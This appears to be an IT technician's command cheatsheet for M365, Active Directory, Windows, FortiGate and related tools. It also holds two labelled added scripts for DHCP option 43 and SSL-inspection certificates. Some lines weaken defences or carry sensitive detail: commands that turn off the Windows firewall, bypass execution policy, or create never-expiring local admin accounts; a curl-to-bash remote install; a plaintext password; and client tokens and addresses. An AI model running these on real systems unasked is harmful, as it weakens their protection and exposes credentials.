    Install-WindowsUpdate -Install -AcceptAll -AutoReboot
}
else {
    Write-Output "No updates available."
}

Exchange Online

Installation:

Install-Module -Name ExchangeOnlineManagement

OR

Install-Module ExchangeOnlineManagement

Connect

Connect-ExchangeOnline

Add M365 Users To Groups

Connect-ExchangeOnline

Connect-MsolService

#Get Group ObjectID

Get-MsolGroup

#Adds user to a group Confirm with yes

Add-UnifiedGroupLinks -Identity "Employee Vacation" -LinkType Members -Links Bwheeler@M365B202155.OnMicrosoft.com -confirm

# 2.  Next we need to add the user to Self Service Password reset group

#grab user Object ID from Azure AD

Get-MsolUser -UserPrincipalName "youraccount@o365.onmicrosoft.com" | Select-Object * | Format-List

#Grab the group Object ID

Get-MsolGroup

#add user to group, first add the group Object ID and second is the member ObjectID

Add-MsolGroupMember -GroupObjectId 7d80c38a-5d49-44a1-90c8-57836e5c2f2e -GroupMemberType User  -GroupMemberObjectId 8d48c20b-a054-4cc3-9ac2-c47ea58f0eda

Enable or Disable OWA access

Import-Module ExchangeOnlineManagement

Connect-ExchangeOnline -UserPrincipalName admin@M365x486451.onmicrosoft.com

Set-CASMailbox kylem@baronmachine.com -OWAEnabled $false

Set-CASMailbox AlexW@M365x486451.OnMicrosoft.com -OWAEnabled $true

Enable Hyper-V

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All

Get M365 Licensing

# Example below

# for psim had to pull users and total licenses for Microsoft Project, this can be used for any M365 license

1. Connect-MsolService

2. Get-MsolAccountSku

3. Get-MsolUser | Where-Object {($_.licenses).AccountSkuId -match "PROJECTCLIENT"}

Active Directory

Get-ADUser -Identity justinb -Properties LockedOut | Select-Object samaccountName,Lockedout| ft -AutoSize

Get-ADUser justinb -Properties Name,lockoutTime |

Select-Object Name,@{n='lockoutTime';e={[DateTime]::FromFileTime($_.lockoutTime)}}

Unlock-ADAccount justinb -Confirm

# alternative: unlock via the pipeline
Get-ADUser -Identity justinb | Unlock-ADAccount

# verify
Get-ADUser -Identity justinb -Properties LockedOut | Select-Object samaccountName,Lockedout


Disable users in AD with Powershell

Disable-ADAccount -Identity danm

Confirmed with the following Command:

Get-ADUser dbehike | select name, Enabled

Get-ADUser danm | select name, Enabled

Disable Welcome email M365 Groups

Set-ExecutionPolicy RemoteSigned

Install-Module PowerShellGet -Force

Install-Module ExchangeOnlineManagement

Connect-ExchangeOnline

#Disable welcome message

Connect-ExchangeOnline

Set-UnifiedGroup -Identity "nhvacation@psimp.com" -UnifiedGroupWelcomeMessageEnable:$false

M365 User Onboarding

#connect the tenant

Connect-MsolService

#For License assignment

Get-MsolAccountSku

#create new user

New-MsolUser -UserPrincipalName "jasonborn@M365x486451.onmicrosoft.com" -DisplayName "Jason Born" -FirstName "Jason" -LastName "Born" -UsageLocation "US" -LicenseAssignment M365x486451:ENTERPRISEPREMIUM

#set the password

Set-MsolUserPassword –UserPrincipalName "jasonborn@M365x486451.onmicrosoft.com" –NewPassword "uglySneeze46" -ForceChangePassword $False

#To remove accounts (for whatever reason- accidentally added etc.)

To Remove user :

Remove-MsolUser -UserPrincipalName "jasonborn@M365x486451.onmicrosoft.com" -Force

Windows Defender

Get-MpThreat

Get-MpPreference

Get-MpThreatDetection


Full Defender Scan

start-mpscan -scantype fullscan

Enable Safe Attachments for Sharepoint, OneDrive and Teams

Connect-ExchangeOnline

Set-AtpPolicyForO365 -EnableATPForSPOTeamsODB $true

Verify:

Get-ATPPolicyForO365

Disable Windows Defender Firewall

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

Defender for O365

#Use PowerShell to view rules for preset security policies

Get-ATPBuiltInProtectionRule

Get-EOPProtectionPolicyRule -Identity "Standard Preset Security Policy"

#view both at the same time

Write-Output -InputObject ("`r`n"*3),"EOP rule - Standard preset security policy",("-"*79);Get-EOPProtectionPolicyRule -Identity "Standard Preset Security Policy"; Write-Output -InputObject ("`r`n"*3),"Defender for Office 365 rule - Standard preset security policy",("-"*79);Get-ATPProtectionPolicyRule -Identity "Standard Preset Security Policy"

#Built in protection preset

Set-ATPBuiltInProtectionRule -Identity "ATP Built-In Protection Rule" -ExceptIfRecipientDomainIs <"domain1","domain2",... | $null> -ExceptIfSentTo <"user1","user2",... | $null> -ExceptIfSentToMemberOf <"group1","group2",... | $null>

Microsoft 365 In-place archive (outlook)

#connect Exchange Online via Powershell and Sign-in as global admin

Connect-ExchangeOnline

Enable for user

Enable-Mailbox -Identity <username> -Archive

Enable Tenant wide

Set-OrganizationConfig -AutoExpandingArchive

Send as Alias Exchange Online

Set-executionPolicy Remotesigned

Install-Module ExchangeOnlineManagement -AllowClobber -force

Connect-ExchangeOnline

Get-OrganizationConfig | select SendFromAliasEnabled


#SET

Set-OrganizationConfig -SendFromAliasEnabled $true

#VALIDATE

Get-OrganizationConfig | select SendFromAliasEnabled

Add Domain/address to Safe Senders

Get-Mailbox -ResultSize Unlimited | Set-MailboxJunkEmailConfiguration -TrustedSendersAndDomains @{Add="resolvetech.biz","support@resolvetech.biz"}

M365 Message Trace & Quarantined mail

Get-QuarantineMessage -SenderAddress accounting@compoundingsolutions.net | Release-QuarantineMessage -ReleaseToAll

Get-MessageTrace -SenderAddress accounting@compoundingsolutions.net -RecipientAddress ap@psimp.com -StartDate 1/03/2023 -EndDate 1/13/2023

(Get-QuarantineMessage).identity | ForEach {Get-QuarantineMessage -Identity $_} | Where {$_.QuarantinedUser -ne $null}


Get-MessageTrace -SenderAddress *.comcast.net -RecipientAddress ap@psimp.com -StartDate 1/03/2023 -EndDate 1/13/2023

Disable Viva Insight Emails

Get current setting

Get-UserBriefingConfig

Get-UserBriefingConfig -Identity brian.wheeler@psimp.com

Disable for single user

Set-UserBriefingConfig -Identity meganb@lazydev.onmicrosoft.com -Enabled $false

Disable Viva Completely for all users

# Get all users from Exchange Online

$users = Get-User

# Disable Microsoft Viva Briefing

$users | Foreach { Set-UserBriefingConfig -Identity $_.UserPrincipalName -Enabled $false }

Trace & Quarantined Mail Exchange Online

Quarantined message to txt file

Get-QuarantineMessage -SenderAddress "voicemail@noveliron.com" | Out-File C:\quarantined.txt

quarantine Messages to console

Get-QuarantineMessage -SenderAddress "voicemail@noveliron.com"

messagetrace output to txt file

$startDate = (Get-Date).AddDays(-10)

$endDate = Get-Date

Get-MessageTrace -StartDate $startDate -EndDate $endDate  -SenderAddress voicemail@noveliron.com | Select-Object Timestamp, SenderAddress, RecipientAddress, Status, Received, Subject | Out-File C:\trace.txt

message trace output to console

$startDate = (Get-Date).AddDays(-10)

$endDate = Get-Date

Get-MessageTrace -StartDate $startDate -EndDate $endDate  -SenderAddress voicemail@noveliron.com | Select-Object Timestamp, SenderAddress, RecipientAddress, Status, Received, Subject

messagetrace brian

Get-MessageTrace -RecipientAddress romil.patel@psimp.com -StartDate 02/15/2023 -EndDate 02/16/23

MFA Enforcement

Connect to Azure AD

Connect-AzureAD

Prompt for main office IP address

$MainOfficeIP = Read-Host "Enter the main office IP address (e.g. 0.0.0.0/32)"

Create a named location for the main office

$MainOfficeLocation = New-AzureADMSNamedLocation -DisplayName "Main Office" -Locations $MainOfficeIP

Check Device Uptime

(get-date) - (gcim Win32_OperatingSystem).LastBootUpTime

Exchange Meeting Rooms Working Hours

Set-MailboxCalendarConfiguration -Identity MainConferenceRoom@noveliron.com -WorkingHoursStartTime 07:00:00

Set-MailboxCalendarConfiguration -Identity SmallConferenceRoom@noveliron.com -WorkingHoursStartTime 07:00:00

Set-MailboxCalendarConfiguration -Identity MainConferenceRoom@noveliron.com -WorkingHoursTimeZone "Eastern Standard Time"

Set-MailboxCalendarConfiguration -Identity SmallConferenceRoom@noveliron.com -WorkingHoursTimeZone "Eastern Standard Time"

Get-MailboxCalendarConfiguration -Identity mainconferenceroom@noveliron.com

Get-MailboxCalendarConfiguration -Identity SmallConferenceRoom@noveliron.com

Add Printers

#!ps

Add-Printer -ConnectionName "\\PS-FS-01\Canon Upstairs"

#!ps

Add-Printer -ConnectionName "\\PS-FS-01\Canon Downstairs"

Grant Mailbox access Exchange Online

# Gets the permissions currently set on the mailbox
Get-MailboxPermission -Identity "supplier"

# Grants the user Tammi Vetree Full Access permission to the "supplier" mailbox
Add-MailboxPermission -Identity "supplier" -User "Tammi Vetree" -AccessRights FullAccess -InheritanceType All

Get Distribution Group Members

Get-DistributionGroupMember -Identity "all-novel@noveliron.com" | Select-Object DisplayName,PrimarySmtpAddress | Export-Csv -Path "C:\all-novel-members.csv" -NoTypeInformation

Get-DistributionGroupMember -Identity "all-rose@rosesteelinc.com" | Select-Object DisplayName,PrimarySmtpAddress | Export-Csv -Path "C:\all-rose-members.csv" -NoTypeInformation

Installed Updates

wmic qfe list

Grab Sha256 hash

CertUtil -hashfile "C:\Program Files (x86)\Common Files\Aladdin Shared\HASP\hasplms.exe" SHA256

setting is overridden by a policy defined at a more specific scope

#Set execution Policy if you get errors due to scope

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope Process -Force

Find 10 Largest Files

can be used for quick deletions if a drive is maxed out

gci -r| sort -descending -property length | select -first 10 name, length, directory

List users with Archive Mailbox enabled M365

Get-Mailbox -ResultSize Unlimited -RecipientTypeDetails UserMailbox | Where-Object {$_.ArchiveStatus -eq "Active"} | Select DisplayName, ArchiveStatus

https://morgantechspace.com/2021/01/check-size-and-status-of-archive-mailbox-powershell.html#:~:text=We%20can%20use%20the%20Get,other%20mailbox%2Drelated%20statistics%20data.  

TLS issue with PS Scripts making Web Requests

# Force TLS 1.2 for older Windows versions

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

Get Connected Bluetooth devices
Get-PnpDevice -class Bluetooth | ? HardwareID -match 'DEV_' | Select *

RESOTECH

Github

Note: Testing for automating Onboarding/Offboarding and setting up standard Conditional Access Policies in M365. Google Workspaces offboarding with google takeout and sending it to an administrator’s google drive.

Github used for windows update powershell script in Private RESOTECH Github Repositories and version control via Github Desktop application. In the future look into learning git cli.

Formerly used this version control for Sysmon XML configuration file for compliance customers. Currently have a few powershell scripts uploaded there that need to be tested for automating certain workflows. Likely won’t need Conditional Access / MFA enforcement scripts due to Netlogic’s Baseline Builder

Black Magic aka Voodoo (DISM & SFC Commands)

Sometimes it works and other times it does nothing… Hit or miss. May run if device is in automatic startup repair boot loop

dism /online /cleanup-image /restorehealth

sfc /scannow

dism /online /cleanup-image /scanhealth

dism /online /cleanup-image /checkhealth

dism /online /cleanup-image /restorehealth

DISM /Online /Cleanup-Image /RestoreHealth /Source:WIM:X:\Sources\Install.wim:1 /LimitAccess

DISM /Online /Cleanup-Image /RestoreHealth /Source:E:\Sources\install.wim

Get-WindowsImage -ImagePath "D:\sources\install.wim"

#Check Disk
chkdsk /f /r C:

#fix boot and rebuild BCD via CLI (bootrec runs from the WinRE / recovery command prompt)
bootrec /rebuildbcd
bootrec /fixmbr
bootrec /fixboot

#check OSDevicePartition

bcdedit /set {default} device partition=c:

bcdedit /set {default} osdevice partition=c:

#disable synthetic timers

bcdedit /set useplatformtick yes

#disable dynamic tick

Bcdedit /set disabledynamictick yes

Disable Hibernation

#disable

powercfg.exe /hibernate off

powercfg /hibernate off

#enable

powercfg.exe /hibernate on

Fast Startup

Powercfg -h off

Update GPO’s

gpupdate /force

Domain Time

tzutil /s "Eastern Standard Time"

Automate Windows Update Via GPO

Location of Powershell Script:

\\CKEL-FILE\Store\updateWindows.ps1

Create a scheduled task running as SYSTEM

Choose Daily, weekly, monthly parameters


Action choose a Program:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Add Arguments (optional): the UNC path of the script. See the CKEL lab for an example:

\\CKEL-FILE\Store\updateWindows.ps1

Get Network Connection Type

#Check if the network connection is public/private/domain type (for win defender)

Get-NetConnectionProfile

#Public/private/domain as options

Set-NetConnectionProfile -Name "NetworkName" -NetworkCategory Private


#change name

Set-NetConnectionProfile -Name "CurrentProfileName" -NewName "NewProfileName"

Set-NetConnectionProfile -Name "Network" -NetworkCategory 'DomainAuthenticated'


Legend:

Public

Private

DomainAuthenticated

Display GPO Policies and Mapped Drives

Run this as the user in question

gpresult /R

net use

In the future it would be worth testing clearing the kerberos tickets using "klist purge"

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/klist 

It appears group membership is being cached or is being delayed in some way and kerberos tickets seem like a logical place to start diagnosing

Installing apps on RDS

Put RDS into Install mode

change user /install

after installation return to execute mode

change user /execute

Update Checksums ArchLinux

updpkgsums

HyperV Extend Drive Space & Diskpart

HyperV: https://www.nakivo.com/blog/increase-disk-size-hyper-v-complete-guide/ 

DiskPart: https://www.lifewire.com/delete-windows-recovery-partition-4128723 

diskpart

list volume

#use list partition

list partition

select Partition 4

delete partition override

Check Free Disk Space macOS

df -h

Block Personal OneDrive Sign-in

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\OneDrive /v DisablePersonalSync /t REG_DWORD /d 1 /f

Enable Network Discovery

netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes

#disable

netsh advfirewall firewall set rule group="Network Discovery" new enable=No

Query Local Administrators

net localgroup Administrators

Add/Delete Local Administrators

net localgroup users domainname\username /add

net localgroup users GIP\IQMS /add

net localgroup administrators [username] /delete

net localgroup administrators GIP\IQMS  /delete

Group Policy

gpresult /R

Batch Scripts

Office 365 Installation with a menu

@echo off
setlocal
:menu
cls
echo.
echo Choose an option:
echo 1) Install Microsoft Office 64-bit
echo 2) Install Microsoft Office 32-bit
echo 3) Install Microsoft Access
echo 4) Remove Microsoft Office
echo.
set "option="
set /p option=Enter your choice:
rem Quote both sides so an empty entry cannot break the comparison
if "%option%"=="1" goto install64
if "%option%"=="2" goto install32
if "%option%"=="3" goto installAccess
if "%option%"=="4" goto remove
echo Invalid choice, try again.
pause
goto menu

:install64
echo Installing Microsoft Office 64-bit...
start /wait \\server\share\Office64.exe /quiet
goto end

:install32
echo Installing Microsoft Office 32-bit...
start /wait \\server\share\Office32.exe /quiet
goto end

:installAccess
echo Installing Microsoft Access...
start /wait \\server\share\Access.exe /quiet
goto end

:remove
echo Removing Microsoft Office using SARA recovery tool...
start /wait \\server\share\SARA.exe /quiet
goto end

:end
echo Installation completed.
pause

Backup Outlook files and autocomplete

@echo off
setlocal
rem RoamCache lives under the user's local AppData (a C:\users\*\... wildcard path cannot be searched by dir)
set "source_folder=%LOCALAPPDATA%\Microsoft\Outlook\RoamCache"
set "destination_folder=C:\Temp"
if not exist "%destination_folder%\Outlook PST Files" mkdir "%destination_folder%\Outlook PST Files"

echo Backing up Outlook PST files...
rem %USERPROFILE% is already the full profile path, so it is not nested under C:\Users
xcopy "%USERPROFILE%\Documents\Outlook Files\*.pst" "%destination_folder%\Outlook PST Files" /s /c /y

echo Grabbing largest autocomplete stream .dat file from RoamCache directory...
rem dir /o-s lists largest first; the first line of that listing is the file we want
set "largest="
for /f "delims=" %%a in ('dir /b /a-d /o-s "%source_folder%\*.dat"') do (
  if not defined largest set "largest=%source_folder%\%%a"
)
if not defined largest (
  echo No .dat files found in %source_folder%
  goto end
)
copy /y "%largest%" "%destination_folder%\Autocomplete Stream.dat"

:end
echo Backup completed.
pause

Recognize Autocomplete Files

@echo off
setlocal
set "roamcache_folder=%LOCALAPPDATA%\Microsoft\Outlook\RoamCache"
echo Identifying old and recent autocomplete stream .dat files...

rem Autocomplete stream files are named Stream_Autocomplete_0_<GUID>.dat.
rem dir /o-d lists newest first and /od oldest first; take the first line of each listing.
set "recent="
for /f "delims=" %%a in ('dir /b /a-d /o-d "%roamcache_folder%\Stream_Autocomplete*.dat"') do (
  if not defined recent set "recent=%%a"
)
set "old="
for /f "delims=" %%a in ('dir /b /a-d /od "%roamcache_folder%\Stream_Autocomplete*.dat"') do (
  if not defined old set "old=%%a"
)

echo Old autocomplete stream .dat file: %old%
echo Recent autocomplete stream .dat file: %recent%
pause

Fortigate

General Information

CKEL-40F

WAN: 32:85:f0:19:bf:28

LAN 10.3.0.1 - proxmox

VLAN3 10.3.3.1 - SYN

VLAN6 10.3.6.1 - CK

VLAN7 10.3.7.1 - CK_Wireless

VLAN9 10.3.9.1 - RESO

VLAN66 10.3.66.1 - Analog_Devices

VLAN69 10.3.69.1 - IOT Guest access plus TV’s/xbox/etc

OLD 40F WAN Mac: ac:71:2e:eb:70:b2

Fortigate CLI

Check resource usage

press M to sort by memory

diagnose sys top 5 30

Continuous Ping

# exe ping-options repeat-count 10000

# exe ping 8.8.8.8

Check the resource utilization on the FortiGate Cont.

 

diagnose hardware sysinfo memory

get system performance status

get system performance top

diagnose system top

Crashlog

diagnose debug crashlog read

Run the following packet sniffer in the CLI

# diagnose sniffer packet any host x.x.x.x and port 53

Set Mac Address on Interface

config sys int

edit <interface>

set macaddr <MAC address>

end

Restart Routing Engine  

exec router restart

DHCP Option 43

Get controller IP converted to hex: https://tcpip.wtf/en/unifi-l3-adoption-with-dhcp-option-43-on-pfsense-mikrotik-and-others.htm 

https://help.ui.com/hc/en-us/articles/204909754-Remote-Adoption-Layer-3#7 

config system dhcp server

    edit 1

        config options

            edit 1

                set code 43

                set type hex

                set value 2b 1a 31 2e 32 2e 33 2e 34

end

Add a local dns entry that points unifi to your controller,  example:

unifi  →  104.200.30.137
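Generating the value for the set value line above, as an added example that is not from the original cheatsheet. It encodes the controller IP in the form the linked Ubiquiti article documents (sub-option 01, length 04, then the four raw IP octets), prints it both colon-separated and in the space-separated form FortiOS takes, and can decode an existing payload so a DHCP scope can be audited for a stale controller address. The function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example: DHCP option 43 payload for UniFi Layer-3 adoption.
# Encoding assumed here (per Ubiquiti's L3 adoption article): 01 04 <ip octets>.

# Fail unless $1 is a dotted-quad IPv4 address with each octet in 0..255.
validate_ipv4() {
  local ip=$1 octet
  local IFS=.
  set -- $ip
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    case $octet in
      ''|*[!0-9]*) return 1 ;;
    esac
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Encode: 192.168.1.10 -> 01:04:c0:a8:01:0a
unifi_option43_hex() {
  local ip=$1 octet out="01:04"
  validate_ipv4 "$ip" || { echo "invalid IPv4 address: $ip" >&2; return 1; }
  local IFS=.
  for octet in $ip; do
    out=$(printf '%s:%02x' "$out" "$octet")
  done
  printf '%s\n' "$out"
}

# Same payload as space-separated bytes, the form FortiOS "set value" expects.
unifi_option43_fortios() {
  unifi_option43_hex "$1" | tr ':' ' '
}

# Decode an existing payload (colon or space separated) back to the controller IP.
# Rejects anything that is not exactly sub-option 01, length 04, four bytes.
unifi_option43_decode() {
  local hex b1 b2 b3 b4
  hex=$(printf '%s' "$1" | tr -d ': ' | tr 'A-F' 'a-f')
  [ "${#hex}" -eq 12 ] || { echo "payload must be 6 bytes (01 04 + IPv4)" >&2; return 1; }
  [ "$(printf '%s' "$hex" | cut -c1-4)" = "0104" ] || { echo "payload does not start with 01 04" >&2; return 1; }
  b1=$(printf '%s' "$hex" | cut -c5-6)
  b2=$(printf '%s' "$hex" | cut -c7-8)
  b3=$(printf '%s' "$hex" | cut -c9-10)
  b4=$(printf '%s' "$hex" | cut -c11-12)
  printf '%d.%d.%d.%d\n' "$((0x$b1))" "$((0x$b2))" "$((0x$b3))" "$((0x$b4))"
}

# Usage: ./option43.sh <controller-ip>
if [ $# -eq 1 ]; then
  unifi_option43_hex "$1" && unifi_option43_fortios "$1"
fi
```

Paste the space-separated output into the set value line of the DHCP server config; running the decode function against the value already in a config is a quick way to confirm it still points at the live controller.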

Set the HTTPS certificate for GUI on CLI

If you get locked out of gui, etc:

config system global

show full | grep admin-server-cert

set admin-server-cert Fortinet_Factory

set admin-server-cert face_fortigategui

end

Full

OpenSSL Self Signed Certificate Setup for SSL Inspection

#navigate to windows desktop from WSL Linux server

cd /mnt/c/users/ckadmin/desktop/WVPTCerts

## Company Name: companyID

## Root CA Certificate (for deep Inspection)

# Generate root private key

openssl genrsa -aes256 -out companyID_root_private.key 2048

# Generate root CA certificate

#   Add to Windows Trusted Root Certificate Authority

#   Input Country, State, Org Name Only

openssl req -new -x509 -days 3650 -extensions v3_ca -key companyID_root_private.key -out companyID_root_ca.crt

## Service1

# Generate private key for service1

openssl genrsa -aes256 -out companyID_service1_private.key 2048

# Generate CSR using service1 private key

#   Skip "challenge password" and "an optional company name"

openssl req -new -key companyID_service1_private.key -out companyID_service1.csr

 

# Prep EXT File

#   Rename file

#   Delete the dns or ip entry as needed

#   Update the remaining entry to use service1 ip/hostname

# Generate certificate from service1 CSR using Root CA

openssl x509 -req -in companyID_service1.csr -CA companyID_root_ca.crt -CAkey companyID_root_private.key -CAcreateserial -out companyID_service1.crt -days 3650 -sha256 -extfile companyID_service1.ext

# Fortigate certificates can be imported with

# Import > Certificate > Import Certificate > Certificate (cert, key and password)

========== extfile ==========
authorityKeyIdentifier=keyid,issuer
basicConstraints=CA:FALSE
keyUsage = digitalSignature, nonRepudiation, keyEncipherment, dataEncipherment
subjectAltName = @alt_names
[alt_names]
DNS.1 = vpn.domain.com
IP.1 = 123.123.1.1
=========================
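The root-CA-plus-service-certificate procedure above as one repeatable script, added here as an example; it is not the cheatsheet author's script. It assumes openssl is on PATH, a placeholder key passphrase (override with CERT_PASS), the subject fields /C=US/ST=State, and the function names make_inspection_chain and verify_chain, none of which come from the notes. It adds the step the notes leave implicit: verifying the new certificate against the root and checking the SAN landed, so a mistyped ext file is caught before anything is imported into the FortiGate. The root private key it writes is what lets anyone mint certificates that inspected clients will trust, so keep it off the firewall and out of shared folders.

```shell
#!/usr/bin/env bash
# Added example: root CA for deep inspection + one service certificate, non-interactive.
# Subject fields, passphrase and file names are this example's assumptions.
set -eu

# make_inspection_chain <outdir> <company id> <service hostname> <service ip>
# Writes <company>_root_ca.crt (import into Trusted Root CAs on clients) and
# <company>_service1.crt/.key (import into the FortiGate with the passphrase).
make_inspection_chain() {
  outdir=$1 company=$2 host=$3 ip=$4
  pass=${CERT_PASS:-ChangeMe-PlaceholderPassphrase}   # constructed placeholder
  mkdir -p "$outdir"

  # Root CA: AES-256 encrypted key (as on the page) and a 10-year self-signed CA cert
  openssl genrsa -aes256 -passout "pass:$pass" -out "$outdir/${company}_root_private.key" 2048 2>/dev/null
  openssl req -new -x509 -days 3650 -extensions v3_ca \
    -key "$outdir/${company}_root_private.key" -passin "pass:$pass" \
    -subj "/C=US/ST=State/O=$company" \
    -out "$outdir/${company}_root_ca.crt"

  # Service key and CSR (-subj replaces the interactive prompts; no challenge password)
  openssl genrsa -aes256 -passout "pass:$pass" -out "$outdir/${company}_service1_private.key" 2048 2>/dev/null
  openssl req -new -key "$outdir/${company}_service1_private.key" -passin "pass:$pass" \
    -subj "/C=US/ST=State/O=$company/CN=$host" \
    -out "$outdir/${company}_service1.csr"

  # Ext file: end-entity cert (CA:FALSE) with both DNS and IP SANs so either address validates
  cat > "$outdir/${company}_service1.ext" <<EOF
authorityKeyIdentifier=keyid,issuer
basicConstraints=CA:FALSE
keyUsage = digitalSignature, nonRepudiation, keyEncipherment, dataEncipherment
subjectAltName = @alt_names
[alt_names]
DNS.1 = $host
IP.1 = $ip
EOF

  # Sign the CSR with the root; -CAcreateserial writes the .srl file reused for later certs
  openssl x509 -req -in "$outdir/${company}_service1.csr" \
    -CA "$outdir/${company}_root_ca.crt" -CAkey "$outdir/${company}_root_private.key" -passin "pass:$pass" \
    -CAcreateserial -out "$outdir/${company}_service1.crt" -days 3650 -sha256 \
    -extfile "$outdir/${company}_service1.ext"
}

# verify_chain <outdir> <company>: the leaf must chain to the root and carry a SAN.
# Prints OK and returns 0 only when both checks pass.
verify_chain() {
  outdir=$1 company=$2
  openssl verify -CAfile "$outdir/${company}_root_ca.crt" "$outdir/${company}_service1.crt" >/dev/null || return 1
  openssl x509 -in "$outdir/${company}_service1.crt" -noout -text | grep -q 'Subject Alternative Name' || return 1
  echo OK
}

# Usage: ./make_chain.sh ./WVPTCerts companyID vpn.domain.com 123.123.1.1
if [ $# -eq 4 ]; then
  make_inspection_chain "$@"
  verify_chain "$1" "$2"
fi
```

Run it once per customer with the company id, the service hostname and its IP; the ext file is generated from those arguments instead of being hand-edited, which is where the DNS/IP entry mistakes the notes warn about usually creep in.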

Disable SIP ALG and SIP Session Helper

Step1

config system settings

set sip-helper disable

set sip-nat-trace disable

set default-voip-alg-mode kernel-helper-based

end

Step 2

config system session-helper

show

Here you will want to find the entry for SIP; it is typically 12 or 13, but the number may differ by software version and model

delete 12

Alternatively use the entry you found in the previous step

end

Step 3

Enter the following commands in the CLI to disable RTP processing

config voip profile

edit default

config sip

set rtp disable

end

end

Restart IPS Engine

diag test app ipsmonitor 99

SSL VPN Setup

Video also on RESO-DT-CHRIS

https://hudu.resolvetech.biz/kba/fortigate-firewall-standardization-3b014387219f 

ResolveTech Help Page

  • Provides contact support information
  • help.resolvetech.biz/edit (This will allow you to edit pages for different clients)
  • Identifier: https://help.resolvetech.biz/?c= 
  • After the equal sign you’d input the client identifier. A few examples are…

  • This page includes links to all of our cognito forms to capture more information for tickets in the interest of saving time
  • Push out ResolveTech Help Shortcut via GPO
  • Images can be uploaded to the site and it acts as a static HTML page with our generic Contact Support PDF also in there.
  • See the previous clients for example, very easy to edit a page and add a form or add a update

https://help.resolvetech.biz/?c=ironnTCsn5szwZaAjREvhQmHfTVTLXWRBuDzfx5LHLoJ

https://help.resolvetech.biz/?c=nepcnTCsn5szwZaAjREvhQmHfTVTLXWRBuDzfx5LHLoJ

https://help.resolvetech.biz/?c=plodSNxBJ53NpwT7GXTuPuvrPJynFn3rjjWqFR7a9havt56p67kaS38tmfvd

https://help.resolvetech.biz/?c=PSIMnTCsn5szwZaAjREvhQmHfTVTLXWRBuDzfx5LHLoJ

NGINX

Test config

sudo nginx -t

Restart Service

sudo systemctl restart nginx

Use local directory for Scripts

pushd %~dp0

%~dp0

Only need pushd on network shares

WMIC set local admin password to never expire

WMIC USERACCOUNT WHERE Name='rtadmin' SET PasswordExpires=FALSE

WMIC USERACCOUNT WHERE Name='yahadmin' SET PasswordExpires=FALSE

Create Local Admin through ScreenConnect macOS

dscl . -create /Users/rtadmin

dscl . -create /Users/rtadmin UserShell /bin/bash

dscl . -create /Users/rtadmin RealName "RT Admin"

dscl . -create /Users/rtadmin UniqueID "510"

dscl . -create /Users/rtadmin PrimaryGroupID 20

dscl . -create /Users/rtadmin NFSHomeDirectory /Users/rtadmin

dscl . -passwd /Users/rtadmin passwordgoeshere

dscl . -append /Groups/admin GroupMembership rtadmin

Print Spooler Commands

net stop spooler

net start spooler

Add Local Administrator

This is for windows CLI

net user rtadmin passwd /add /y /fullname:"ResolveTech"

net localgroup administrators rtadmin /add

Duo bad timestamp error

#sync time server

w32tm /resync

Windows Boot information

systeminfo | find "System Boot Time"

Wasabi

access-key=

secret-key=

Office built-in updates

Run Command from Screen Connect

cd "C:\Program Files\Common Files\microsoft shared\ClickToRun" & OfficeC2RClient.exe /update user

Tailscale

Get version

tailscale version

Update

Tailscale update

Update the Tailscale client version to the latest version, or to a different version.

tailscale update [flags]

Available flags:

--dry-run Show what update would do, without performing the update and without prompting to start the update.

--track The track to check for updates, either “stable” or “unstable”. If not specified, the update uses the track currently in effect for the client.

--version An explicit version to use for the update or downgrade. You cannot specify both --track and --version.

--yes Perform the update without interactive prompts. Defaults to false.

If you downgrade to a version that does not have the tailscale update functionality, you won’t be able to run tailscale update to return to the prior version. You would need to perform an update without using the Tailscale CLI.

To determine the current version on a client, run tailscale version.

Examples:

Update to the latest version within your current track (stable or unstable, depending on what you’re running):

tailscale update

Update to the latest version within your current track without using interactive prompts:

tailscale update --yes

Update to Tailscale v1.34:

tailscale update --version=1.34.0

Update to the latest unstable version:

tailscale update --track=unstable

Turn On Auto Updates Linux

tailscale set --auto-update

https://tailscale.com/kb/1067/update?tab=linux 


Pihole override Local DNS

https://tailscale.com/kb/1114/pi-hole/ 

Loki-ts Exit Node

Tailscale is now overriding local dns and using local pihole

tailscale up --accept-routes=true --accept-dns=false --advertise-exit-node

Windows Defender Firewall

NetSh Advfirewall set allprofiles state on

NetSh Advfirewall set allprofiles state off

netsh firewall show state

Bitlocker

Example

manage-bde -lock X:

Disable EFS

fsutil behavior set disableencryption 1

Client GPO’s

Client GPO’s and various One Off GPO’s will go here.

Any scheduled task GPO will have the ps or batch script live in the GPO’s folder directory under Scripts

ScoutDNS

Scheduled Task

program/script: Powershell

Argument: -ep bypass -f \\Ckel-dc1\sysvol\cktech.org\Policies\{7202A61F-307B-4F28-BE57-817DD28B0BB7}\scoutinstall.ps1

Defender for EndPoint

Scheduled task. From defender portal → Settings → Endpoints → device management → Onboarding   you grab the OnboardingScript.cmd file from Group Policy deployment method.


Path to installer:  //FileShareLocation/WindowsDefenderATPOnboardingScript.cmd

Block OneDrive from Redirecting Documents, Downloads and Pictures Directories

Copy OneDrive Admx and adml files from a windows device with onedrive installed.

After that you want to create and link the gpo to the computers OU and from there you enable the following object:

Prevent users from moving their Windows known folders to OneDrive         Enabled

https://learn.microsoft.com/en-us/sharepoint/use-group-policy

Enable WSL, Hyper V, VMP

One Liner to enable Windows Sub System for Linux, Hyper V and Virtual Machine Platform on Windows systems:

dism.exe /online /enable-feature /featurename:Microsoft-Hyper-V-All /featurename:VirtualMachinePlatform /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart


HomeBrew MacOS

# Install Homebrew:

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install chrome

brew install --cask google-chrome


#run updates homebrew

brew update

#chrome update

brew upgrade --cask google-chrome


Keystone Hardware Wallet

Verify Hash of Update File

certutil -hashfile C:/users/chris/Downloads/M-12.0 SHA256

Keystone 3 Pro

certutil -hashfile C:\Users\Chris\Downloads\keystone3.bin  SHA256

